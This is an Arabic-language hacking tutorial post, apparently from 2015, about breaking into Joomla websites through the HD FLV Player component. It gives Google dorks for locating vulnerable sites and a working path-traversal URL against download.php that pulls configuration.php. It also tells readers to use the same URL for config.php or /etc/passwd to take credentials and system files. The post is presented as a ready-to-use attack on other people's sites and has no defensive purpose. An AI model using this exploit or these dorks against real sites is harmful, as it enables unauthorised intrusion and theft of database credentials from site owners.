إختراق مواقع جوملا hack joomla website 2015

نبدى بالصلات وتسليم على اشرف المرسلين وعلى سيدنا محمد عليه اجمل صلاوات وتسليم

إخواني أخواتي في الدين سلام الله عليكم

في هذه التدوين سوف اشارككم طرق إختراق مواقع جوملا عن طريق إضافة في سكريبت تدعى ب

HD FLV تمكنك من سحب ملف config.php   etc/passwd 

dork الدورك

inurl:/component/hdflvplayer/

# Dork google 2:  inurl:com_hdflvplayer

exloit الإستغلال 

 
/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php
يمكن استبدال
 configuration.php
ب ماذا تريد السحب
Config.php
etc/passwd

 

فيديوا توضيحي

 

dont forgiv subscrib me

https://www.facebook.com/ati9ni
https://twitter.com/zouniz

 http://www.youtube.com/user/MrOuniz

 { شكرا على المشاهدة }